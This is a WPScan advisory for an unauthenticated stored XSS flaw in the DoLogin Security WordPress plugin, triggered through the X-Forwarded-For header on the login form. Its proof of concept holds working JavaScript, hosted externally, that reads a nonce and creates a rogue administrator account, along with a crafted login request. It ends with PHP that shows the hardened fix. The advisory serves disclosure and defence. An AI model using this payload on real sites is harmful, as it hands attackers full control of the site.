wpvulndb | Bartlomiej Marek | WPVDB-ID: 8AEBEAD0-0EAB-4D4E-8CEB-8FEA0760374F
History: Aug 30, 2023 - 12:00 a.m.

DoLogin Security < 3.7 - Unauthenticated Stored Cross-Site Scripting

2023-08-30 00:00:00
Bartlomiej Marek
wpscan.com
8
Tags: wordpress, stored xss, login form, ip addresses, security plugin

EPSS: 0.001 (percentile 21.7%)

Description

The plugin does not properly sanitize IP addresses taken from the X-Forwarded-For header, which an attacker can use to conduct Stored XSS attacks via WordPress' login form.

PoC

1. Put the JavaScript payload on html.cafe:

    const url = 'https://s…t/wp-admin/user-new.php';
    fetch(url)
      .then(response => response.text())
      .then(html => {
        const parser = new DOMParser();
        const doc = parser.parseFromString(html, 'text/html');
        const nonceValue = doc.getElementById('_wpnonce_create-user').value;
        const requestOptions = {
          method: 'POST',
          headers: { 'Content-Type': 'application/x-www-form-urlencoded' },
          body: `action=createuser&_wpnonce_create-user=${encodeURIComponent(nonceValue)}&_wp_http_referer=%2Fwp-admin%2Fuser-new.php&user_login=administrator&email=[email protected]&first_name=&last_name=&url=&pass1=O%21k6c5%5EfjO%5E1sF%26%24%21%26V2PG9e&pass2=O%21k6c5%5EfjO%5E1sF%26%24%21%26V2PG9e&send_user_notification=0&role=administrator&ure_other_roles=&createuser=Add+New+User`,
        };
        return fetch(url, requestOptions);
      });

2. Send an HTTP login request with a specially crafted X-Forwarded-For header:

    POST /wp-login.php HTTP/2
    Host:
    Cookie: wordpress_test_cookie=WP%20Cookie%20check
    Content-Length: 106
    Cache-Control: max-age=0
    Sec-Ch-Ua:
    Sec-Ch-Ua-Mobile: ?0
    Sec-Ch-Ua-Platform: ""
    Upgrade-Insecure-Requests: 1
    Origin: https://
    Content-Type: application/x-www-form-urlencoded
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Referer: https:///wp-login.php
    Accept-Encoding: gzip, deflate
    Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7
    X-Forwarded-For:

    log=XSSor&pwd=abcd&wp-submit=Log+In&redirect_to=https%3A%2F%2F%2Fwp-admin%2F&testcookie=1
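The root cause in the description is a client-controlled header being stored as an "IP address" and later rendered. The following PHP is an added illustration of the hardened pattern (validate the header as an IP, only trust it behind a known proxy, escape on output); it is not DoLogin Security's own code, and the function names, the trusted-proxy list and the sample request are assumptions.

```php
<?php
// Added example, not the plugin's code. $_SERVER-style input is constructed
// inline so the script runs offline.

// Vulnerable pattern: the raw header value is treated as the client IP and
// stored verbatim, so whatever the client sends reaches the database.
function client_ip_unsafe(array $server): string {
    return $server['HTTP_X_FORWARDED_FOR'] ?? $server['REMOTE_ADDR'];
}

// Hardened: use X-Forwarded-For only when the TCP peer is a reverse proxy we
// operate (assumed list), take the first hop, and keep it only if it parses
// as an IPv4/IPv6 address. Anything else falls back to REMOTE_ADDR, which the
// client cannot forge.
function client_ip_safe(array $server, array $trusted_proxies): string {
    $remote = $server['REMOTE_ADDR'] ?? '';
    $xff    = $server['HTTP_X_FORWARDED_FOR'] ?? '';
    if ($xff !== '' && in_array($remote, $trusted_proxies, true)) {
        $first = trim(explode(',', $xff)[0]);
        if (filter_var($first, FILTER_VALIDATE_IP) !== false) {
            return $first;
        }
    }
    return filter_var($remote, FILTER_VALIDATE_IP) !== false ? $remote : '0.0.0.0';
}

// Output side: even a validated value is HTML-escaped when rendered in the
// admin log table. Inside WordPress, esc_html() does the same job.
function render_ip_cell(string $ip): string {
    return '<td>' . htmlspecialchars($ip, ENT_QUOTES | ENT_HTML5, 'UTF-8') . '</td>';
}

// Constructed sample request: the peer is our proxy, the header carries markup.
$server = [
    'REMOTE_ADDR'          => '10.0.0.2',
    'HTTP_X_FORWARDED_FOR' => '<script>alert(1)</script>, 203.0.113.7',
];
echo "unsafe : " . client_ip_unsafe($server) . "\n";
echo "safe   : " . client_ip_safe($server, ['10.0.0.2']) . "\n";
echo "render : " . render_ip_cell(client_ip_unsafe($server)) . "\n";
```

Validation on input and escaping on output are independent defences; the fix for this class of bug needs both, because a stored value may be rendered by code that was not written with the header in mind.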
